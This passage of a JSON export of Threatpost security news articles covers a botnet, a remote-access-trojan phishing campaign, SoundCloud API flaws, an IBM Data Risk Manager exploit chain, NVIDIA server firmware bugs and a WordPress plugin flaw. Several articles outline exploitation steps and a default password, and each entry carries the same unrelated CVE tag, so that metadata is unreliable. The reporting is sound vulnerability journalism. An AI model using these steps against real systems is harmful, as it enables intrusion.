Nigam came to a similar conclusion:\n\n\u201cThe use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public,\u201d according to the researcher.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-15T20:41:24", "type": "threatpost", "title": "Hoaxcalls Botnet Exploits Symantec Secure Web Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-05-15T20:41:24", "id": "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "href": "https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:28:08", "description": "The legitimate remote access tool (RAT) called NetSupport Manager, used for troubleshooting and tech support, is being converted into a malicious weapon by cybercriminals. Researchers at Palo Alto Networks\u2019 Unit 42 division have spotted a spam campaign attempting to deliver a malicious Microsoft Word document that uses the disguise of a NortonLifeLock-protected file.\n\nNortonLifeLock is a security utility for password-protecting attachments, among other things. If a recipient opens the document via Microsoft Office Outlook, a prompt appears that asks users to \u201cenable content\u201d to open the document \u2013 clicking \u201cyes\u201d executes macros.\n\n\u201cTo the user, the document appears to contain personal information that requires a password to view,\u201d said researchers, in a [recent analysis](<https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/>). \u201cOnce the document is opened and the user clicks \u2018Enable Content,\u2019 the macro is executed and the user is presented with a password dialog box.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers added that the password is likely provided in the body of the phishing email, because it has to be correct; no malicious activity occurs until the correct key is entered. Once the key is accepted, the macros create and execute a batch file called alpaca.bat.\n\n\u201cThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two characters that are eventually linked together to construct the final command to download and execute the RAT on the victim,\u201d according to Unit 42. \u201cThe command string is executed via the VBA shell function, which [creates and executes alpaca.bat].\u201d\n\nThe campaign uses a range of tactics to obfuscate its activity from both dynamic and static analysis, according to researchers. For instance, the batch script uses msiexec, which is a legitimate part of the Windows Installer service. It\u2019s used to download and install a Microsoft Intermediate Language (MSIL) binary from a legitimate domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to suppress any Windows dialogs from the user.\n\nThe campaign also uses the PowerShell PowerSploit framework to carry out the installation of the malicious file activity. The MSI installs a PowerShell script in the victim\u2019s %temp% directory named REgistryMPZMZQYVXO.ps1. This contains another PowerShell script that is responsible for installing the NetSupport Manager RAT onto the victim\u2019s machine.\n\n\u201cThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the PowerSploit framework,\u201d according to the analysis. \u201cIt contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).\u201d\n\nThe RAT installer PowerShell script interestingly aborts installation if Avast or AVG Antivirus Software is running on the target machine. If not, it installs 12 files that make up the NetSupport Manager RAT to a random directory and sets up persistence by creating the following registry key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\n\n\u201cOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST,\u201d the researchers wrote.\n\nResearchers said that the campaign is likely part of a larger offensive that dates back to early November, with email subject lines reusing themes associated with refunds, as well as transaction and order inquiries. The attached documents contain the target company\u2019s name.\n\n\u201cMalicious use of the NetSupport Manager remote access tool has also been reported by both [FireEye ](<https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html>)and [Zscaler ](<https://www.zscaler.com/blogs/research/netsupport-rat-installed-fake-update-notices>)researchers,\u201d researchers concluded. \u201cWhile this activity appears to be broad and at large scale, there are indications, such as the document name, that show the actor\u2019s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\u201d\n", "cvss3": {}, "published": "2020-03-02T21:59:34", "type": "threatpost", "title": "NetSupport Manager RAT Spread via Bogus NortonLifeLock Docs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-02T21:59:34", "id": "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "href": "https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:31", "description": "Online music platform SoundCloud, which can be thought of as an audio-based YouTube for music creators, has addressed several security bugs in its APIs that could lead to denial-of-service (DoS) or account takeover via credential-stuffing.\n\nSoundCloud recently [sold a $75 million stake](<https://techcrunch.com/2020/02/11/music-streaming-pioneer-soundcloud-raises-75m-from-pandora-owner-siriusxm/>) to satellite radio giant SiriusXM and the two also inked a lucrative ad deal. SoundCloud claims to host 200 million different music tracks on its online platform.\n\nAccording to researcher Paulo Silva of Checkmarx Security Research, three different groups of security vulnerabilities were found in the platform: A authentication issue which could lead to account takeover; a rate-limiting bug that could lead to DoS; and an improper input validation.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe broken authentication issue has to do with not having a set number of login tries before locking someone out of the account \u2013 which opens the door to unlimited brute-force attacks from cybercriminals trying to guess passwords.\n\n\u201cThe /sign-in/password endpoint of api-v2.soundcloud.com does not implement proper account lockout based on failed authentication attempts,\u201d according to Silva, in [an analysis](<https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory>) posted Tuesday. \u201cIt solely relies on rate limiting which can be evaded using several combinations of use_agent, device_id and signature.\u201d\n\nThat means that credential stuffing \u2014 the automated process of verifying that breached pairs of usernames and passwords work for not only the services that they originated from, but also other services \u2014 could have become a real issue. Digital Shadows [recently pointed out](<https://threatpost.com/password-breaches-fueling-booming-credential-stuffing-business/125900/>) that the market for credential stuffing software and services is thriving thanks in large part to an epidemic of breaches of usernames and passwords.\n\nCheckmarx also found a related user enumeration weakness that could be used to verify valid user account IDs as well, making it even easier to hack accounts. An attacker can exploit this to guess account names and then probe whether or not they actually exist.\n\n\u201cBoth /sign-in/identifier and /users/password_reset endpoints of api-v2.soundcloud.com can be used to enumerate user accounts,\u201d explained the firm. \u201cIn both cases, the endpoints provide different responses depending on whether the requested user account identifier exists or not.\u201d\n\nThe rate-limiting issue meanwhile has to do with SoundCloud not limiting how many song results can be retrieved in certain searchers.\n\nFor instance, the /me/play-history/tracks API endpoint, which allows users to view recently played songs, doesn\u2019t enforce rate limiting. Thus, an attacker can send a large number of POST requests from a single machine/IP address, or can use a high-volume GET request to return hundreds of tracks at once. This can not only potentially overwhelm the API if several of these are sent at the same time, but it could also be used to artificially inflate the statistics for demand for certain tracks or artists.\n\n\u201cThe lack of rate limiting may compromise the system availability, making it vulnerable to DoS attacks,\u201d according to Checkmarx. \u201cFrom a business perspective, not limiting the amount of requests to this endpoint may compromise the data integrity, since it may create biased tracks-statistics.\u201d\n\nA related issue has to do with the /tracks endpoint of api-v2.soundcloud.com, which Silva said does not implement proper resources limiting \u2013 also potentially leading to DoS.\n\n\u201cSince no validation is performed regarding the number of tracks IDs in the ids list, it is possible to manipulate the list to retrieve an arbitrary number of tracks in a single request,\u201d he said, adding that in testing, researchers were able to retrieve up to 689 tracks in a single request.\n\n\u201cUsing a specially crafted list of track IDs to maximize the response size, and issuing requests from several sources at the same time to deplete resources in the application layer, will make the target\u2019s system services unavailable,\u201d Silva explained.\n\nThe improper input validation issue meanwhile would allow the attacker to use extra-long character strings when filling in the description, title and genre forms while uploading songs, according to the research. An exploit could make use of this to carry out cross-site scripting attacks or SQL injection.\n\n\u201cThe /tracks/{track_urn} endpoint of api-v2.soundcloud.com does not properly validate and enforce the length of [these] properties,\u201d Silva explained. \u201cIssuing requests directly to the API server puts the attacker in control of an additional 61960 bytes (total of 66160 bytes).\u201d\n\nFor its part, SoundCloud promptly fixed the problem and sent out a statement: \u201cAt SoundCloud, the security of our users\u2019 accounts is extremely important to us. We are always looking for ways to enhance the security of our platform for our users. We appreciate Checkmarx reaching out to discuss their findings.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-12T18:48:59", "type": "threatpost", "title": "SoundCloud Tackles DoS, Account Takeover Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-12T18:48:59", "id": "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "href": "https://threatpost.com/soundcloud-dos-account-takeover/152838/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:14", "description": "UPDATED\n\nFour serious security vulnerabilities in the IBM Data Risk Manager (IDRM) have been identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\nIBM weighed in on the problem this week, after a researcher went public with the bugs, one of which may end up being a zero-day issue \u2014 Big Blue is still investigating.\n\nIDRM is a software platform that aggregates threat data from disparate security systems, in order to perform enterprise security risk analysis. According to security researcher Pedro Ribeiro from Agile Information Security, older versions (v. 2.0.1 to 2.0.3) of the IDRM Linux virtual appliance contains bugs pertaining to authentication bypass; command injection; insecure default password; and arbitrary file download. The first three can be chained together to achieve RCE in vulnerable versions.[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cIDRM is an enterprise security product that handles very sensitive information,\u201d Ribeiro wrote in a [Tuesday analysis](<https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md>). \u201cThe hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.\u201d\n\n**Three Chained Bugs for RCE**\n\nThe first three bugs that Ribeiro found can be combined to allow a remote attacker to gain full system compromise, according to the research.\n\nThe first is as-yet unaddressed by IBM: An authentication-bypass issue that exists in the appliance\u2019s API endpoint, /albatross/user/login. This endpoint is authenticated by a method that takes the username and sessionID credentials of the person trying to log in, and checks if username exists in the database and if the sessionId is associated with that username. If it all checks out, the application returns a newly generated random password for that username. However, Ribeiro demonstrated that a remote attacker can send a specially crafted request that subverts this process and allows an attacker to retrieve a valid Bearer administrative token. That can then be used to access various APIs.\n\n\u201cIt\u2019s also possible to login as a normal web user on the /albatross/login endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console,\u201d explained the researcher. \u201cIn any case\u2026authentication is now completely bypassed and we have full administrative access to IDRM.\u201d\n\nThe command-injection bug, which has a patch, meanwhile exists because the IDRM exposes an API at /albatross/restAPI/v2/nmap/run/scan that allows an authenticated user to perform nmap scans.\n\n\u201cHaving access to nmap allows running arbitrary commands, if we can upload a script file and then pass that as an argument to nmap with \u2013script=<FILE>,\u201d the researcher explained. \u201cHowever, to achieve code execution in this way, we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to /home/a3user/agile3/patches/<FILE>.\u201d\n\nThat method is supposed to accept a patch file, process it and apply it. However, Ribeiro explained that \u201cthere are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.\u201d\n\nIn order to exploit this bug, an attacker would need to have an authenticated session as an administrator, which can be achieved with the first vulnerability.\n\nThe third bug, which IBM says can be solved by reconfiguring the appliance, comes from the use of hard-coded credentials: The administrative user in the IDRM virtual appliance is \u201ca3user\u201d by default.\n\n\u201cThis user is allowed to login via SSH and run sudo commands, and it is set up with a default password of \u2018idrm,'\u201d said Ribeiro.\n\nAnd, when combined with the first two bugs, this allows an unauthenticated attacker to achieve RCE as root on the IDRM virtual appliance, leading to complete system compromise, the researcher said.\n\nA Metasploit [proof-of-concept exploit module](<https://github.com/rapid7/metasploit-framework/pull/13300>) implementing the full RCE chain has been released and a video demonstration can be [found here](<https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2>).\n\n**Arbitrary File Download**\n\nThe fourth bug, also fixed in later versions, is a path traversal bug that comes from an improper limitation of a pathname to a restricted directory.\n\n\u201cIDRM exposes an API at /albatross/eurekaservice/fetchLogFiles that allows an authenticated user to download log files from the system,\u201d explained Ribeiro. \u201cHowever, the logFileNameList parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.\u201d\n\nHe added that exploitation is \u201cvery simple.\u201d\n\nThis flaw too can be chained. When combined with the first authentication-bypass bug, an unauthenticated attacker can download any file readable by \u201ca3user\u201d off the system, Ribeiro said. A [second Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/13301>) implementing this was released and a video demo [can be found here](<https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp>).\n\n**Patch Information and Mitigation**\n\nVersions 2.0.1 to 2.0.3 have been confirmed as vulnerable to the first three flaws, according to Ribeiro; as for the fourth issue, version 2.0.1 is not vulnerable, but v. 2.0.2 and 2.0.3 are. According to [IBM\u2019s advisory](<https://www.ibm.com/support/pages/node/6195705>), issued on April 22 after Ribeiro disclosed his findings, the command-injection vulnerability and the arbitrary-file download bug were both fixed in version 2.0.4. IBM also said that the default-password issue is a configuration choice and up to administrators to change ([guidance available here](<https://www.ibm.com/support/knowledgecenter/en/SSJQ6V_2.0.6/com.ibm.idrm.doc/install/tsk/tsk_installguide_idrm_configuration.html>)).\n\nAs for the first vulnerability, the authentication bypass, IBM said in the advisory that it is \u201cinvestigating this report and will provide further information on fix action as appropriate.\u201d\n\nThe current version of the IDRM is v. 2.0.6.\n\nInitially, Ribeiro made an attempt to coordinate disclosure with IBM via CERT/CC, but IBM did not accept the vulnerability report for review:\n\n_\u201cWe have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for \u2018enhanced\u2019 support paid for by our customers,\u201d according to Big Blue\u2019s response to CERT/CC. \u201cThis is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within six months prior to submitting a report.\u201d_\n\nHowever, after Ribeiro made his findings public, Big Blue said the rejection was a mistake.\n\n\u201cA process error resulted in an improper response to the researcher who reported this situation to IBM,\u201d a spokesperson told Threatpost on Tuesday. \u201cWe have been working on mitigation steps and they will be discussed in a security advisory to be issued.\u201d\n\n_This article was updated at 4 p.m. ET on Tuesday, April 21 with a statement from IBM, and at 10 a.m. ET on Wednesday, April 22 with fresh advisory information from IBM._\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-21T18:19:01", "type": "threatpost", "title": "RCE Exploit Released for IBM Data Risk Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-21T18:19:01", "id": "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "href": "https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:39:12", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain. NVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "href": "https://threatpost.com/nvidia-patches-critical-bug-in-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T23:46:43", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain,\u201d he said. \u201cNVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "href": "https://threatpost.com/nvidia-critical-bug-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:46", "description": "Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nThe Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.\n\nThe first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CvSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDespite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,\u201d according to Wordfence. \u201cIf an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim\u2019s browser.\u201d\n\nAccording to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However these options aren\u2019t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to [the analysis](<https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/>), released Monday.\n\n\u201cAs such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,\u201d researchers explained in the post.\n\nFor instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user\u2019s browser.\n\nThe second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CvSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or \u201cany number of other tactics that could lead to site takeover,\u201d the firm warned.\n\n\u201cAlthough the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,\u201d according to Wordfence. \u201cThis introduced a PHP object-injection vulnerability via the restore_options_from_request function.\u201d\n\nIn terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and \u201cclean up\u201d once a pre-defined, legitimate process is completed. An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it\u2019s done.\n\nIf this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site\u2019s core configuration settings by sending a specially crafted payload.\n\n\u201cThe deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site\u2019s new configuration to a remote database under their control,\u201d explained Wordfence.\n\nThe researchers added that to be successful, an attacker would need to know which plugins are installed on a given site \u2013 which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.\n\n## **WordPress Plugin Bugs Proliferate**\n\nWordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week [just such a bug was found](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nEarlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning 